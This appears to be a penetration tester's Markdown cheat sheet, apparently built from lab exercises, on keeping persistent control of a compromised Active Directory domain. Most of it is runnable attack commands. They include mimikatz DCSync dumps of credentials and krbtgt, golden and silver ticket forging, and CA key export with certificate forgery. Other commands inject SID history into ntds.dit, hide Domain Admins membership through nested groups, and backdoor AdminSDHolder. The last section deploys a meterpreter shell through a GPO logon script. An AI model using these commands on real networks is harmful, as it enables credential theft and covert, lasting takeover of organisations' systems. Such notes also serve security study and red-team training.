whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Miscellaneous/Active Directory/AD Persistance.md

199 lines
6.7 KiB
Markdown
Raw Normal View History

restructured Misc and RevShells
2022-11-13 16:00:22 +01:00
# Active Directory Persistance
## Using Credentials
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
* Credentials for multiple local administrators
* Service account with delegation permissions
* __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)
### Usage
* Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```
## Using Tickets
* __Golden Ticket__ crafted TGT,
* Needs domain name, domain SID and a user ID to impersonate
* Needs krbtgt NTLM to sign the ticket
* krbtgt hash never rotates automatically, only refreshed manually
* krbtgt hash bypasses smart cards
* TGT can not be older than 20 minutes
* TGT lifetime can be set to years
* TGT can be signed anywhere as long as the krbtgt hash is known
* __Silver Ticket__ crafted TGS
* Signed by targeted service account on a host
* DC is never contacted, no contact to any TGT or KDC
* Non existing user can be used with a local admin group's SID
### Usage
* Craft a golden ticket
```sh
Get-ADDomain
```
```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```
## Using Certificates
* Private key extraction via mimikatz which makes it exportable
```sh
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
```
* Password of the certificate is `mimikatz` afterwards
* Use [ForgeCert](https://github.com/GhostPack/ForgeCert) to create certificate
```sh
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
```
*
* Use Rubeus to request the TGT via
```sh
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
```
* Load the TGT via mimikatz
```sh
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\
```
## Using SID History
* Account logs on -> associated SIDs (group SIDs) added to the user's token -> permissions are set in this way
* SIDs of controlled accounts may be added to the history
* Add Administrator group to the associated SIDs / the token
* `ntds.dit` stores all AD info
* User does not come up on checking groups, the user stays hidden unless searched for explicitly
### Usage
* Check SID history
```sh
Get-ADUser <your ad username> -properties sidhistory,memberof
```
* Check SID of domain admins
```sh
Get-ADGroup "Domain Admins"
```
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
```sh
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
```
* Verify users SIDs
```sh
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
```
## Using Group Memberships
* Most are monitored security wise
* Interesting group for persistence are
* `IT Support`
* Local administrational accounts
* Groups with ownership over GPO
* Nested groups are used to organize an AD
* `Helpdesk`, `Network Manager` is a nested group of `IT Support`
* Joining a nested groups is not as alerting as joining a more general group
### Usage
* Create a new subgroup
```sh
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
```
* And nesting another one
```sh
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```
* Do it a couple of times again and add the last group to Domain Admins
```sh
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
```
* Add the low priv user to the first group
```sh
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
```
* And check
```sh
dir \\<domain>\c$\
```
* Verify nested group
```sh
Get-ADGroupMember -Identity "Domain Admins"
```
## Using ACLs
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
* Domain Admins
* Administrators
* Enterprise/Schema Administrator
* SDProp as a process maps the ACLs to protected groups every hour
## Usage
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add Snap-In -> Active Directory Users and Groups
* View -> Advanced Features
* AdminSDHolder group in Domain -> System
* Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK
* Add the user to other groups with the new propagated permissions
## Using GPOs
* Restricted Group Memberships, admin access to every host in the domain
* Logon Script Deployment, get a shell when a user logs in
### Usage
* Craft a portable executable shell via meterpreter
* Craft a batch script
```sh
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
```
* Copy both to the sysvol
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
* Right click Admins OU -> Create GPO in the domain -> link it -> name it
* Right click created policy -> Enforced
* Right click created policy -> edit -> User Configuration / Policies -> Window Settings -> Scripts (logon/logoff)
* Right click Logon -> Properties -> Scripts tab -> Add -> Browse
* Select the previously created batch script and PE
* Catch the shell when an admin logs on
* Once again open mmc
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
* Click on every other group except Authenticated Users and remove them
* Add -> `Domain Computers` -> check names - OK
* Read Permissions -> OK -> Authenticated Users -> Remove